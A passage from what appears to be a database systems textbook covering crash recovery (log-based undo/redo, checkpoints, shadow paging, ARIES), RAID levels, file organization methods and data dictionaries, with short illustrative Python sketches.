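log = [("T0", "start"), ("T0", "write", "A", 1000, 950), ("T0", "write", "B", 2000, 2050),
       ("T0", "commit"), ("T1", "start"), ("T1", "write", "C", 700, 600)]
print(classify(log))   # ({'T0'}, {'T1'}) -> redo T0, undo T1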
Let us return to our banking example, with transaction T0 and T1 executed in serial order,
T0 followed by T1. Suppose that the system crashes before the successful completion of the
transactions. We shall consider three cases. The logs for each of these cases are as shown below
in Figure 8.2.
Case 1:
First, let us assume that the crash occurs just after the log record for the step
write(B)
of transaction T0 has been written to stable storage (Figure 8.2a). When the system
resumes, it finds the <T0 start> in the log, but there is no corresponding <T0 commit>
or <T0 abort> record. Hence undo(T0) is performed and the amount in the accounts A
and B (on the disk) are restored to Rs.1000 and Rs.2000, respectively.
Case 2:
Let us assume that the crash comes just after the log record for the step:
write(C)
of transaction T1 has been written to stable storage (Figure 8.2b). When the system resumes, two recovery actions need to be taken. The log contains both the record <T0 start> and the record <T0 commit>, hence redo(T0) must be performed. The log contains the record <T1 start> but there is no record <T1 commit> or <T1 abort>, hence undo(T1) must be performed. At the end of the entire recovery procedure, the values of accounts A, B, and C are Rs.950, Rs.2050, and Rs.700, respectively.
Case 3:
Let us assume that the crash occurs just after the log record:
<T1 commit>
has been written to stable storage (Figure 8.2c). When the system resumes, both T0 and T1 need to be redone, since the records <T0 start> and <T0 commit> appear in the log, as do the records <T1 start> and <T1 commit>. After the system performs the recovery procedures redo(T0) and redo(T1), the values in accounts A, B, and C are Rs.950, Rs.2050, and Rs.600, respectively.
8.2.6 Checkpoints
When a system crash occurs, we must refer the log to determine those transactions that
need to be redone and those that need to be undone. In principle, we need to search the entire
log to determine this information. There are two major difficulties with this approach:
1. The search process is time-consuming.
2. Most of the transactions that, according to our algorithm, need to be redone have already written their updates into the database. Although redoing them will cause no harm, it will nevertheless cause recovery to take longer.
Checkpoints reduce this type of overhead. The checkpoint scheme described here is one that:
(a) does not permit any updates to be performed while the checkpoint operation is in progress, and
(b) outputs all modified buffer blocks to disk when the checkpoint is performed.
A checkpoint is performed as follows:
1. Output onto stable storage all log records currently residing in main memory.
2. Output to the disk all modified buffer blocks.
3. Output onto stable storage a log record of the form <checkpoint L>, where
L is a list of transactions active at the time of the checkpoint. Transactions are not
allowed to perform any update actions, such as writing to a buffer block or writing a log record,
while a checkpoint is in progress.
The presence of a <checkpoint L> record in the log allows the system to streamline its
recovery procedure. Consider a transaction Ti that completed prior to the checkpoint. For such
a transaction, the <Ti commit> record or < Ti abort> record appears in the log before the
<checkpoint> record. Any database modifications made by Ti must have been written to the
database either prior to the checkpoint or as part of the checkpoint itself. Thus, at recovery time,
there is no need to perform a redo operation on Ti.
After a system crash has occurred, the system examines the log to find the last <checkpoint L> record, by searching the log backward from the end of the log until the first <checkpoint L> record is found.
The redo or undo operations need to be applied only to transactions in L, and to all
transactions that started execution after the <checkpoint L> record was written to the log. Let
us denote this set of transactions as T.
• For all transactions Tk in T that have no <Tk commit> record or <Tk abort> record in
the log, execute undo(Tk).
• For all transactions Tk in T such that either the record <Tk commit> or the record <Tk
abort> appears in the log, execute redo(Tk).
For example, consider the set of transactions T0, T1, ..., T100. Suppose that the most recent checkpoint took place during the execution of transactions T67 and T69, while T68 and all transactions with subscripts lower than 67 completed before the checkpoint. Thus, only transactions T67, T69, ..., T100 need to be considered during the recovery scheme. Each of them needs to be redone if it has completed (that is, either committed or aborted), or undone if it was incomplete. A fuzzy checkpoint is a checkpoint where transactions are allowed to perform updates even while buffer blocks are being written out.
The recovery algorithm requires that a data item that has been updated by an
uncommitted transaction cannot be modified by any other transaction, until the first transaction
has either committed or aborted.
i. Transaction Rollback
First consider transaction rollback during normal operation i.e., not during recovery
from a system crash. Rollback of a transaction Ti is performed as follows:
1. The log is scanned backward, and for each log record of Ti of the form <Ti, Xj, V1, V2> that is found:
a. The value V1 is written to data item Xj.
b. A special redo-only log record <Ti, Xj, V1> is written to the log, where V1 is the value being restored to data item Xj during the rollback. These log records are sometimes called compensation log records.
2. Once the log record <Ti start> is found the backward scan is stopped, and a log
record <Ti abort> is written to the log.
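The following sketch illustrates this rollback procedure on an assumed log representation (update records shaped as shown in the comment); it is only an illustration of the backward scan and the compensation records, not production recovery code:

# Minimal sketch: roll back one transaction during normal operation.
def rollback(txn, log, db):
    # Update records are assumed to look like ("update", txn, item, old, new).
    for rec in reversed(list(log)):                    # backward scan over a snapshot
        if rec[0] == "update" and rec[1] == txn:
            _, _, item, old, _new = rec
            db[item] = old                             # restore the old value V1
            log.append(("redo-only", txn, item, old))  # compensation log record
        elif rec[0] == "start" and rec[1] == txn:
            log.append(("abort", txn))                 # rollback is complete
            break

db = {"A": 950}
log = [("start", "T1"), ("update", "T1", "A", 1000, 950)]
rollback("T1", log, db)
print(db["A"], log[-1])    # 1000 ('abort', 'T1')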
1. Redo phase
In the redo phase, the system replays updates of all transactions by scanning the log
forward from the last checkpoint. The log records that are replayed include log
records for transactions that were rolled back before system crash, and those that
had not committed when the system crash occurred. This phase also determines all
transactions that were incomplete at the time of the crash, and must therefore be
rolled back. Such incomplete transactions would either have been active at the time
of the checkpoint, and thus would appear in the transaction list in the checkpoint
record, or would have started later. Further, such incomplete transactions would
have neither a <Ti abort> nor a <Ti commit> record in the log.
a. The list of transactions to be rolled back, undo-list, is initially set to the list L
in the <checkpoint L> log record.
b. Whenever a normal log record of the form <Ti, Xj, V1, V2>, or a redo-only log record of the form <Ti, Xj, V2> is encountered, the operation is redone; that is, the value V2 is written to data item Xj.
c. Whenever a log record of the form <Ti start> is found, Ti is added to undo-list.
d. Whenever a log record of the form <Ti abort> or <Ti commit> is found, Ti is
removed from undo-list.
At the end of the redo phase, undo-list contains the list of all transactions that are
incomplete, that is, they neither committed nor completed rollback before the crash.
2. Undo Phase
In the undo phase, the system rolls back all transactions in the undo-list. It performs
rollback by scanning the log backward from the end.
a. Whenever it finds a log record belonging to a transaction in the undo- list, it
performs undo actions just as if the log record had been found during the
rollback of a failed transaction.
b. When the system finds a <Ti start> log record for a transaction Ti in undo-list,
it writes a <Ti abort> log record to the log, and removes Ti from undo-list.
c. The undo phase terminates once undo-list becomes empty, that is, the system
has found <Ti start> log records for all transactions that were initially in undo-
list.
After the undo phase of recovery terminates, normal transaction processing can resume.
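A compact sketch of the two phases, under the same assumed log representation as above, is shown below; it replays history forward from the last checkpoint and then rolls back whatever remains in undo-list. It is an illustration, not a complete recovery manager:

# Minimal sketch of the two-pass recovery algorithm described above.
def recover(log, db):
    # --- Redo phase: scan forward from the last checkpoint, replaying updates.
    cp = max(i for i, r in enumerate(log) if r[0] == "checkpoint")
    undo_list = set(log[cp][1])                      # list L from <checkpoint L>
    for rec in log[cp + 1:]:
        kind = rec[0]
        if kind in ("update", "redo-only"):
            item, new = rec[2], rec[-1]
            db[item] = new                           # redo: write the new value
        elif kind == "start":
            undo_list.add(rec[1])
        elif kind in ("commit", "abort"):
            undo_list.discard(rec[1])
    # --- Undo phase: scan backward, rolling back incomplete transactions.
    for rec in reversed(log[:]):
        if not undo_list:
            break
        if rec[0] == "update" and rec[1] in undo_list:
            item, old = rec[2], rec[3]
            db[item] = old                           # undo: restore the old value
            log.append(("redo-only", rec[1], item, old))
        elif rec[0] == "start" and rec[1] in undo_list:
            log.append(("abort", rec[1]))
            undo_list.discard(rec[1])

db = {"A": 900, "B": 2100}
log = [("checkpoint", []),
       ("start", "T2"), ("update", "T2", "A", 1000, 900), ("commit", "T2"),
       ("start", "T3"), ("update", "T3", "B", 2000, 2100)]
recover(log, db)
print(db)   # {'A': 900, 'B': 2000}: T2 is redone, T3 is undone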
Figure 8.3 shows an example of actions logged during normal operation, and actions
performed during failure recovery. In the log shown in the figure, transaction T1 had committed,
and transaction T0 had been completely rolled back, before the system crashed.
When recovering from a crash, in the redo phase, the system performs a redo of all
operations after the last checkpoint record. In this phase, the list undo-list initially contains T0
and T1. T1 is removed first when its commit log record is found, while T2 is added when its start
log record is found. Transaction T0 is removed from undo-list when its abort log record is found,
leaving only T2 in undo-list. The undo phase scans the log backwards from the end, and when
it finds a log record of T2 updating A, the old value of A is restored, and a redo-only log record is written to the log. When the start record for T2 is found, an abort record is added for T2. Since
undo-list contains no more transactions, the undo phase terminates, completing recovery.
Shadow Copying and Shadow Paging
In the shadow-copy scheme, a transaction that wants to update the database first creates
a complete copy of the database. All updates are done on the new database copy, keeping the
original shadow copy, untouched. If at any point the transaction has to be aborted, the system
merely deletes the new copy. The old copy of the database has not been affected. The current
copy of the database is identified by a pointer, called db-pointer, which is stored on disk. The
Figure 8.4 shows the shadow paging scheme.
If the transaction partially commits i.e., executes its final statement, it is committed as
follows:
1. The operating system is asked to make sure that all pages of the new copy of the
database have been written out to disk.
2. After the operating system has written all the pages to disk, the database system
updates the pointer db-pointer to point to the new copy of the database.
3. The new copy then becomes the current copy of the database.
4. The old copy of the database is then deleted.
5. The transaction is said to have been committed at the point where the updated db-pointer is written to disk.
The implementation actually depends on the write to db-pointer being atomic - either
all its bytes are written or none of its bytes are written. Disk systems provide atomic updates to
entire blocks, or at least to a disk sector. In other words, the disk system guarantees that it will
update db-pointer atomically.
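The sketch below imitates this commit sequence in Python, using ordinary files and os.replace for the atomic pointer update; the file names are invented for illustration, and this is not how a real DBMS manages db-pointer:

import os

def commit_shadow_copy(new_copy_path, pointer_path="db-pointer"):
    # 1. Make sure all pages of the new copy have reached the disk.
    with open(new_copy_path, "rb+") as f:
        os.fsync(f.fileno())
    # 2./3. Atomically switch db-pointer to name the new copy; os.replace is
    #       atomic on both POSIX and Windows, mirroring the atomic block write.
    tmp = pointer_path + ".tmp"
    with open(tmp, "w") as f:
        f.write(new_copy_path)
        f.flush()
        os.fsync(f.fileno())
    os.replace(tmp, pointer_path)
    # 5. The transaction is committed once the new pointer is durably on disk.

# Usage (illustrative): commit_shadow_copy("database.new")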
Shadow copy schemes are commonly used by text editors. Shadow copying can be used
for small databases, but it would be extremely expensive for a large database. A variant of
shadow-copying, called shadow-paging, reduces copying as follows.
▪ The page table itself and all updated pages are copied to a new location.
▪ Any page which is not updated by a transaction is not copied; instead, the new page table simply stores a pointer to the original page.
▪ When a transaction commits, it atomically updates the pointer to the page table, which acts as the db-pointer, to point to the new page table.
Shadow paging does not work well with concurrent transactions and is not widely used in databases.
8.5 ARIES
ARIES differs from the recovery algorithm described above in several ways:
1. Uses a log sequence number (LSN) to identify log records, and stores LSNs in pages to identify which updates have already been applied to a database page.
2. Supports physiological redo: the affected page is physically identified, but the action within the page can be logical.
▪ This reduces logging overhead, since full physical redo would require logging of old and new values for much of the page.
3. Uses a dirty page table to minimize unnecessary redos during recovery.
4. Uses fuzzy checkpointing that only records information about dirty pages and does not require dirty pages to be written out at checkpoint time.
ARIES recovery involves three passes:
a. Analysis pass: determines which transactions need to be undone, which pages were dirty at the time of the crash, and RedoLSN, the LSN from which the redo pass should start.
b. Redo pass: repeats history, redoing all actions from RedoLSN to bring the database to the state it was in before the crash.
c. Undo pass: rolls back all transactions that were incomplete at the time of the crash.
a. Analysis pass
The analysis pass starts from the last complete checkpoint log record. It reads the DirtyPageTable and the list of active transactions recorded there, sets RedoLSN to the minimum RecLSN of the pages in the DirtyPageTable (or to the checkpoint's LSN if the table is empty), and then scans the log forward, adding transactions to undo-list when their log records are found, removing them on commit or abort, and recording newly dirtied pages in the DirtyPageTable.
b. Redo Pass
Redo Pass repeats history by replaying every action not already reflected in the page on
disk. It scans the log forward from RedoLSN. Whenever an update log record is found,
it takes the following action:
1. If the page is not in DirtyPageTable or the LSN of the log record is less than the RecLSN
of the page in DirtyPageTable, then skip the log record
2. Otherwise fetch the page from disk. If the PageLSN of the page fetched from disk is
less than the LSN of the log record, redo the log record
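A small sketch of this redo-pass decision, with assumed field names for the log record, the DirtyPageTable and the page header:

# Minimal sketch: decide whether the redo pass must reapply one update record.
def must_redo(log_rec, dirty_page_table, fetch_page):
    """log_rec: dict with 'lsn' and 'page_id';
    dirty_page_table: maps page_id -> RecLSN;
    fetch_page: function returning the page (with its PageLSN) from disk."""
    rec_lsn = dirty_page_table.get(log_rec["page_id"])
    if rec_lsn is None or log_rec["lsn"] < rec_lsn:
        return False                               # update already on disk: skip
    page = fetch_page(log_rec["page_id"])
    return page["page_lsn"] < log_rec["lsn"]       # redo only if page is older

# Example: page 2390 was dirtied at RecLSN 7570, and its on-disk PageLSN is 7565.
dpt = {2390: 7570}
page_on_disk = {"page_lsn": 7565}
print(must_redo({"lsn": 7570, "page_id": 2390}, dpt, lambda pid: page_on_disk))  # True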
c. Undo Pass
The undo pass performs a backward scan of the log, undoing all transactions in undo-list.
The backward scan is optimized by skipping unneeded log records, as follows:
• The next LSN to be undone for each transaction is set to the LSN of the last log record for that transaction found by the analysis pass.
• At each step, pick the largest of these LSNs to undo, skip back to it, and undo it.
• After undoing a log record:
▪ For ordinary log records, set the next LSN to be undone for the transaction to the PrevLSN noted in the log record.
▪ For compensation log records (CLRs), set the next LSN to be undone to the UndoNextLSN noted in the log record.
8.5.3 Recovery Actions in ARIES
Figure 8.6 illustrates the recovery actions performed by ARIES, on an example log. We
assume that the last completed checkpoint pointer on disk points to the checkpoint log record
with LSN 7568. The PrevLSN values in the log records are shown using arrows in the figure,
while the UndoNextLSN value is shown using a dashed arrow for the one compensation log
record, with LSN 7565. The analysis pass would start from LSN 7568, and when it is complete,
RedoLSN would be 7564. Thus, the redo pass must start at the log record with LSN 7564. Note
that this LSN is less than the LSN of the checkpoint log record, since the ARIES checkpointing
algorithm does not flush modified pages to stable storage. The DirtyPageTable at the end of
analysis would include pages 4894, 7200 from the checkpoint log record, and 2390 which is
updated by the log record with LSN 7570. At the end of the analysis pass, the list of transactions
to be undone consists of only T145 in this example. The redo pass for the above example starts
from LSN 7564 and performs redo of log records whose pages appear in DirtyPageTable. The
undo pass needs to undo only transaction T145, and hence starts from its LastLSN value 7567,
and continues backwards until the record < T145 start> is found at LSN 7563.
ARIES provides a number of other useful features:
1. Recovery independence - pages can be recovered independently of one another.
2. Savepoints - transactions can record savepoints and roll back to a savepoint.
3. Fine-grained locking - index concurrency algorithms that permit tuple-level locking on indices can be used.
4. Recovery optimizations:
▪ Out-of-order redo is possible; redo for a page can be postponed while other log records continue to be processed.
CHAPTER – IX
DATA STORAGE
9.1 RAID
RAID (redundant array of independent disks; originally, redundant array of inexpensive disks) is a way of storing the same data in different places on multiple hard disks to protect the data in the case of a drive failure.
9.1.1. Introduction
Disk organization techniques manage a large number of disks, providing a view of a
single disk of high capacity and high speed by using multiple disks in parallel, and high
reliability by storing data redundantly, so that data can be recovered even if a disk fails.
9.1.2. Motivation for RAID
• Just as additional memory in the form of a cache can improve system performance, additional disks can also improve system performance.
• In RAID we use an array of disks which operate independently. Since there are many disks, multiple I/O requests can be handled in parallel if the required data reside on separate disks.
• A single I/O operation can be handled in parallel if the data required is distributed across
multiple disks.
9.1.3. Benefits of RAID
• Data loss can be very dangerous for an organization
• RAID technology prevents data loss due to disk failure
• RAID technology can be implemented in hardware or software
• Servers make use of RAID Technology
9.1.4. RAID Levels
RAID Level 0: Striping (non-redundant)
• RAID level 0 divides data into block units and writes them across a number of disks. As data is placed across multiple disks, it is also called "data striping".
• The advantage of distributing data over disks is that if different I/O requests are pending
for two different blocks of data, then there is a possibility that the requested blocks are
on different disks
There is no parity checking of data, so if the data in one drive gets corrupted, all the data would be lost; thus RAID 0 does not support data recovery. Spanning is another term used with RAID level 0, because the logical disk spans all the physical drives. RAID 0 implementation requires a minimum of 2 disks.
Advantages
• I/O performance is greatly improved by spreading the I/O load across many channels &
drives.
• Best performance is achieved when data is striped across multiple controllers with only one drive per controller.
Disadvantages
• It is not fault-tolerant; failure of one drive will result in all data in an array being lost.
RAID Level 1: Mirroring
• Also known as disk mirroring, this configuration consists of at least two drives that duplicate the storage of data. There is no striping.
• Read performance is improved since either disk can be read at the same time. Write
performance is the same as for single disk storage.
• Every write is carried out on both disks. If one disk in a pair fails, the data is still available on the other.
• Data loss would occur only if a disk fails and its mirror disk also fails before the system is repaired; the probability of this combined event is very small.
RAID Level 2:
This configuration uses striping across disks. This level stripes data at a bit level and
each bit is stored in a separate drive. It requires a disk separately for storing ECC code of data.
The level uses the Hamming code for error correction. It is rarely, if ever, used nowadays.
Advantages
• The use of Hamming ECC allows single-bit errors to be detected and corrected on the fly.
Disadvantages
• The need for hamming code makes it inconvenient for commercial use.
RAID Level 3:
The RAID 3 level stripes data at the byte level. It requires a separate parity disk which stores the parity information for each byte. When a disk fails, data can be recovered with the help of the corresponding parity bytes; for example, to recover the data on a damaged disk, compute the XOR of the bits from the other disks (including the parity disk).
When writing data, the corresponding parity bits must also be computed and written to the parity disk. Because an I/O operation addresses all the drives at the same time, RAID 3 cannot overlap I/O. For this reason, RAID 3 is best for single-user systems with long-record applications.
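The parity computation and recovery described above amount to a bytewise XOR. A minimal sketch with made-up block contents (not tied to any particular RAID implementation):

# Parity-based recovery as used by RAID 3/4/5: the parity block is the bytewise
# XOR of the data blocks, so any single lost block can be rebuilt from the rest.
def xor_blocks(blocks):
    out = bytearray(len(blocks[0]))
    for block in blocks:
        for i, b in enumerate(block):
            out[i] ^= b
    return bytes(out)

data = [b"disk-1-data!", b"disk-2-data!", b"disk-3-data!"]
parity = xor_blocks(data)                 # written to the dedicated parity disk

# Disk 2 fails: rebuild its block from the remaining disks plus parity.
rebuilt = xor_blocks([data[0], data[2], parity])
print(rebuilt == data[1])                 # True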
Advantages
• In case of a disk failure, data can be reconstructed using the corresponding parity byte.
Disadvantages
RAID Level 4:
RAID 4 is quite popular. It is similar to RAID 0 and RAID 3 in a few ways: it stripes data at the block level, as RAID 0 does, and, just like RAID 3, it uses a dedicated parity disk. Combining these two features, RAID 4 stripes data at the block level and stores the corresponding parity in the parity disk. In case of a single disk failure, data can be recovered from this parity disk.
Advantages
• In case of a single disk failure, the lost data is recovered from the parity disk.
Disadvantages
• It does not solve the problem of more than one disk failure.
• The level needs at least 3 disks as well as hardware backing for doing parity calculations.
RAID Level 5:
• RAID 5 uses striping as well as parity for redundancy. It is well suited for heavy read
and low write operations.
• Block-Interleaved Distributed Parity; partitions data and parity among all N + 1 disks,
rather than storing data in N disks and parity in 1 disk. So this level has some similarity
with RAID 4.
Advantages
• This level is known for distributed parity among the various disks in the group.
• In a typical four-disk array, it uses only one-fourth of the storage capacity for parity and leaves three-fourths of the capacity to be used for storing data.
Disadvantages
• The recovery of data takes longer due to parity distributed among all disks.
• It is not able to help in the case where more than one disk fails.
RAID Level 6:
• This technique is similar to RAID 5, but includes a second parity scheme that is
distributed across the drives in the array. The use of additional parity allows the array to
continue to function even if two disks fail simultaneously. However, this extra
protection comes at a cost.
• P+Q Redundancy scheme; similar to Level 5, but stores extra redundant information to
guard against multiple disk failures. Better reliability than Level 5 at a higher cost; not
used as widely.
Advantages
• It can continue to operate even if two disks fail simultaneously.
Disadvantages
• It requires a minimum of 4 drives.
• It needs two disks' worth of capacity for parity, leaving less space for data.
• It needs to write two parity blocks and hence is slower than RAID 5.
• It has limited flexibility.
Each RAID level has its own set of advantages and disadvantages, so you have to decide whether you are looking for safety, speed or storage space.
9.2. FILE ORGANIZATION
We know that data is stored in a database; when we refer to this data in RDBMS terms, we call it a collection of inter-related tables. In physical terms, however, the data is stored on storage media in the form of files.
File organization is a way of organizing the data in such a way that it is easier to insert, delete, modify and retrieve data from the files.
• File organization makes it easier & faster to perform operations (such as read, write,
update, delete etc.) on data stored in files.
• Removes data redundancy. File organization makes sure that redundant and duplicate data get removed. This alone saves the database from the insert, update and delete anomalies that usually occur when duplicate data is present in the database.
• It saves storage cost. By organizing the data, redundant data gets removed, which lowers the storage space required to store the data.
• Improves accuracy. When redundant data is removed and the data is stored in an efficient manner, the chances of the data becoming wrong or corrupted go down.
There are various ways to organize the data. Every file organization method is different
from each other; therefore, each file organization method has its own advantages and
disadvantages. It is up to the developer which method they choose in order to organize the data.
Usually, this decision is made based on what kind of data is present in database.
In the pile file method, one record is inserted after another and the new record is always inserted at the end of the file. If any record needs to be deleted, it is searched for in the memory blocks, and once it is deleted, a new record can be written on the freed memory block.
Figure 9.1 shows a file organized using the pile file method; as you can see, the records are not sorted and are inserted on a first-come, first-served basis. If you want the data to be kept sorted after insertion, use the sorted file method, which is discussed in the next section.
Here we are demonstrating the insertion of a new record R3 in an already present file
using Pile File method. Since this method of sequential organization just adds the new
record at the end of file, the new record R3 gets added at the end of the file, as shown
in the Figure 9.2.
In sorted file method, a new record is inserted at the end of the file and then all the
records are sorted to adjust the position of the newly added record. In Figure 9.3, records
appear in sorted order when the file is organized using sorted file method. In case of a
record updation, once the update is complete, the whole file gets sorted again to change
the position of updated record in the file.
The sorting can be either ascending or descending; in Figure 9.3, the records are sorted
in ascending order.
In Figure 9.4, a new record R3 is added to an existing file. Although the record is added
at the end, its position gets changed after insertion. The whole file gets sorted after
addition of the new record and the new record R3, is placed just after record R1 as the
file is sorted in ascending order using sorted file method of sequential file organization.
Advantages
• It is fast and efficient when we are dealing with huge amount of data.
• This method of file organization is mostly used for generating various reports and
performing statistical operations on data.
Disadvantages
• Sorting the file takes extra time and it requires additional storage for sorting
operation.
The heap file organization method is a simple yet powerful file organization method. In this method, the records are added to memory data blocks in no particular order. Figure 9.5
demonstrates the Heap file organization. As you can see, records have been assigned to data
blocks in memory in no particular order.
Since the records are not sorted and not stored in consecutive data blocks in memory,
searching a record is a time-consuming process in this method. Update and delete operations also give poor performance, as the records need to be searched first for updation and deletion, which is itself a time-consuming operation. However, if the file size is small, these operations are among the fastest compared to other methods, so this method is widely used for small files. This method requires memory optimization and cleanup, as it doesn't free up the allocated data block after a record is deleted.
Data Insertion
Figure 9.6 demonstrates the addition of a new record in the file using heap file
organization method. As you can see a free data block which has not been assigned to any
record previously, has been assigned to the newly added record R2. The insertion of new record
is pretty simple in this method as there is no need to perform any sorting; any free data block is
assigned to the new record.
Advantages
• This is a popular method when a huge number of records need to be added to the database. Since the records are assigned to free data blocks in memory, there is no need to perform any special check for existing records when a new record needs to be added. This makes it easier to insert multiple records at once without worrying about disturbing the file organization.
• When there are few records and the file size is small, it is faster to search and retrieve the data from the database using heap file organization compared to sequential file organization.
Disadvantages
• This method is inefficient if the file size is big, as the search, retrieve and update
operations consume more time compared to sequential file organization.
• This method doesn’t use the memory space efficiently, thus it requires memory cleanup
and optimization to free the unused data blocks in memory.
In this method, a hash function is used to compute the address of a data block in memory to store the record. The hash function is applied on certain columns of the records, known as
hash columns to compute the block address. These columns/fields can either be key or non-key
attributes.
Figure 9.7 demonstrates the hash file organization. As shown here, the records are stored
in database in no particular order and the data blocks are not consecutive. These memory
addresses are computed by applying hash function on certain attributes of these records.
Fetching a record is faster in this method as the record can be accessed using hash key column.
No need to search through the entire file to fetch a record.
Inserting a record
In Figure 9.8, you can see that a new record R5 needs to be added to the file. The same hash function that generated the addresses for the existing records in the file will be used again to compute the address (find a data block in memory) for this new record, by applying the hash function on certain columns of the record.
Advantages
• This method doesn't require explicit sorting, as records are placed directly into the memory blocks determined by their hash keys.
• Reading and fetching a record is faster compared to other methods, as the hash key is used to quickly locate and retrieve the data from the database.
• Records are not dependent on each other and are not stored in consecutive memory locations, which protects the database from read, write, update and delete anomalies.
Disadvantages
• Can cause accidental deletion of data, if columns are not selected properly for hash
function. For example, while deleting an Employee "Steve" using Employee_Name as
hash column can cause accidental deletion of other employee records if the other
employee name is also "Steve". This can be avoided by selecting the attributes properly,
for example in this case combining age, department or SSN with the employee_name
for hash key can be more accurate in finding the distinct record.
• Memory is not efficiently used in hash file organization as records are not stored in
consecutive memory locations.
• If there are more than one hash columns, searching a record using a single attribute will
not give accurate results.
Indexed sequential access method, also known as ISAM, is an upgrade to the conventional sequential file organization method. You can say that it is an advanced version of
sequential file organization method. In this method, primary key of the record is stored with an
address as shown in Figure 9.9; this address is mapped to an address of a data block in memory.
This address field works as an index of the file.
In this method, reading and fetching a record is done using the index of the file. Index
field contains the address of a data record in memory, which can be quickly used to read and
fetch the record from memory.
Advantages
This method is more flexible compared to other methods, as it allows the index field (address field) to be generated for any column of the record. This makes searching easier and more efficient, as searches can be done using multiple column fields.
This allows range retrieval of the records: since the address field is stored with the primary key of the record, we can retrieve records based on a certain range of primary key values.
This method allows partial searches as well. For example, an employee name starting with "St" can be used to search for all the employees whose names start with the letters "St". This will return all the records where the employee name begins with the letters "St".
Disadvantages
• After adding a record to the file, the file needs to be re-organized to maintain the
sequence based on primary key column.
• Requires memory cleanup because when a record is deleted, the space used by the record
needs to be released in order to be used by the other record.
• Performance issues are there if there is frequent deletion of records, as every deletion
needs a memory cleanup and optimization.
Cluster file organization is different from the other file organization methods. Other file
organization methods mainly focus on organizing the records in a single file (table). Cluster file
organization is used, when we frequently need combined data from multiple tables.
While other file organization methods organize tables separately and combine the result
based on the query, cluster file organization stores the combined data of two or more frequently
joined tables in the same file known as cluster as shown in Figure 9.10. This helps in accessing
the data faster.
The example shown in Figure 9.10 is an index-based cluster file organization. In this type, the cluster is formed based on the cluster key, and this cluster key works as an index of the cluster.
Since the EMP_DEP field is common to both tables, it becomes the cluster key when these two tables are joined to form the cluster. Whenever we need to find the combined record of
employees and department based on the EMP_DEP, this cluster can be used to quickly retrieve
the data.
Hash-based cluster file organization is the same as index-based cluster file organization except that, in this type, the hash function is applied on the cluster key to generate a hash value, and that value is used in the cluster instead of the index.
Note: The main difference between these two types is that in an index-based cluster the records are stored with the cluster key, while in a hash-based cluster the records are stored with the hash value of the cluster key.
Advantages
• This method is popularly used when multiple tables need to be joined frequently based on the same condition.
• When a table in the database is frequently joined with multiple tables of the same database, the cluster file organization method is more efficient compared to other file organization methods.
Disadvantages
• Not suitable for large databases: This method is not suitable if the size of the database
is huge as the performance of various operations on the data will be poor.
• Not flexible with joining condition: This method is not suitable if the join condition of the tables keeps changing, as it may take additional time to traverse the joined tables again for the new condition.
• Isolated tables: If tables are not that related and there is rarely any join query on tables
then using this file organization is not recommended. This is because maintaining the
cluster for such tables will be useless when it is not used frequently.
Similar to ISAM file organization, B+ file organization also works with the key and index value of the records. It stores the records in a tree-like structure, which is why it is also known as B+ tree file organization. In B+ file organization, the leaf nodes store the records and intermediate nodes only contain pointers to the leaf nodes; these intermediate nodes do not store any record.
The root node and intermediate nodes contain a key field and an index field. The key field is the primary key of a record, which can be used to distinctly identify the record; the index field contains the pointer (address) of the leaf node where the actual record is stored.
B+ Tree Representation
Let’s say we are storing the records of employees of an organization. These employee
records contain fields such as Employee_id, Employee_name, Employee_address etc. If we
consider Employee_id as primary key and the values of Employee_id ranges from 1001 to 1009
then the B+ tree representation can be as shown in Figure 9.11.
The important point to note here is that the records are stored only at the leaf nodes; the other nodes contain the key and index value (pointer to a leaf node). Leaf node 1001 means that it stores the complete record of the employee whose employee id is "1001". Similarly, node 1002 stores the record of the employee with employee id "1002", and so on. The main advantage of B+ file organization is that searching for a record is faster. This is because all the leaf nodes (where the actual records are stored) are at the same distance from the root node and can be accessed quickly. Since intermediate nodes do not contain records and only contain pointers to the leaf nodes, the height of the B+ tree is shorter, which makes traversal easier and faster.
Advantages
• Searching is faster: As we discussed earlier, since all the leaf nodes are at minimal
distance from the root node, searching a record is faster in B+ tree file organization.
• Flexible: Adding new records and removing old records can be easily done in a B+ tree, as the B+ tree is flexible in terms of size; it can grow and shrink based on the records that need to be stored. It has no restriction on the number of records that can be stored.
• Allows range retrieval: It allows range retrieval. For example, if there is a requirement
to fetch all the records from a certain range, then it can be easily done using this file
organization method.
• Allows partial searches: Similar to ISAM, this also allows partial searches. For
example, we can search all the employees where id starts with “10“.
• Better performance: This file organization method gives better performance than other
file organization methods for insert, update, and delete operations.
Disadvantages
• This method is not suitable for static tables, as it is less efficient for them compared to other file organization methods.
Data Dictionary
A data dictionary is defined as a DBMS component that stores the definition of data characteristics and relationships. It is simply "data about data", i.e., metadata. The DBMS data dictionary provides the DBMS with its self-describing characteristic. In effect, the data dictionary resembles an X-ray of the company's entire data set, and is a crucial element in the data administration function.
Two main types of data dictionary exist: integrated and stand-alone.
1) An integrated data dictionary is included with the DBMS. For example, all relational
DBMSs include a built-in data dictionary or system catalog that is frequently accessed
and updated by the RDBMS.
2) Other DBMSs, especially older types, do not have a built-in data dictionary; instead, the DBA may use third-party, stand-alone data dictionary systems.
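As an illustration of an integrated data dictionary, the sketch below queries SQLite's built-in catalog table sqlite_master; other RDBMSs expose similar metadata, for example through INFORMATION_SCHEMA views. SQLite is used here only because it is convenient to run, not because the text prescribes it:

# Illustrative only: SQLite exposes its integrated data dictionary through the
# sqlite_master catalog table.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE account (acc_no INTEGER PRIMARY KEY, "
             "branch TEXT, balance REAL)")
conn.execute("CREATE INDEX idx_branch ON account(branch)")

# Ask the catalog which objects exist and how they were defined.
for name, obj_type, sql in conn.execute(
        "SELECT name, type, sql FROM sqlite_master"):
    print(obj_type, name)
    print("   ", sql)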
Data dictionaries can also be classified as active or passive. An active data dictionary is
automatically updated by the DBMS with every database access, thereby keeping its access
information up-to-date. A passive data dictionary is not updated automatically and usually
requires a batch process to be run. Data dictionary access information is normally used by the
DBMS for query optimization purpose.
The data dictionary’s main function is to store the description of all objects that interact
with the database. Integrated data dictionaries tend to limit their metadata to the data managed
by the DBMS. Stand-alone data dictionary systems are usually more flexible and allow the DBA to describe and manage all of the organization's data, whether or not they are computerized. Whatever the data dictionary's format, its existence provides database designers and end users with a much improved ability to communicate. In addition, the data dictionary is the tool that helps the DBA to resolve data conflicts. Although there is no standard format for the information stored in the data dictionary, several features are common. For example, the data dictionary typically stores descriptions of all:
• Data elements that are defined in all tables of all databases. Specifically, the data
dictionary stores the name, data types, display formats, internal storage formats, and
validation rules. The data dictionary tells where an element is used, by whom it is used
and so on.
